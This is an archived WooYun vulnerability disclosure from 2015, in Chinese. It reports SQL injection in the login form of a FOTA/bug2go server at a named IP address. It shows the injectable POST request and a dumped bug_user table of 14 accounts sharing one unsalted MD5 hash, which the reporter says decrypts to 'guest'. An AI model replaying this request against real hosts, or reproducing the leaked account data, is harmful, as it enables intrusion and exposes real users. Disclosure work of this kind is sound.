乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
如题
和上次别人给你提交的那个fota地址不一样http://218.2.113.254/
POST / HTTP/1.1Host: 218.2.113.254Content-Length: 47Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://218.2.113.254Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://218.2.113.254/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8formhash=a1592ec6&login=1&username=1&password=1
Database: bug2goTable: bug_user[14 entries]+-------+----------+----------------------------------+---------+| admin | username | password | salt |+-------+----------+----------------------------------+---------+| 0 | guest | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | uxcvxoho | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 13077034 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 13061525 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 14100501 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 13050531 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 12073958 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 11113113 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 12020013 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 11100275 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 03070109 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 12030468 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | 13077069 | c42d47602bc29f89644841702ca0ebf6 | <blank> || 0 | mgbvfapo | c42d47602bc29f89644841702ca0ebf6 | <blank> |+-------+----------+----------------------------------+---------+
解密后是guest
你们更懂求给20rank
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 11:22
感谢提交,此漏洞已经在其他渠道知晓。
暂无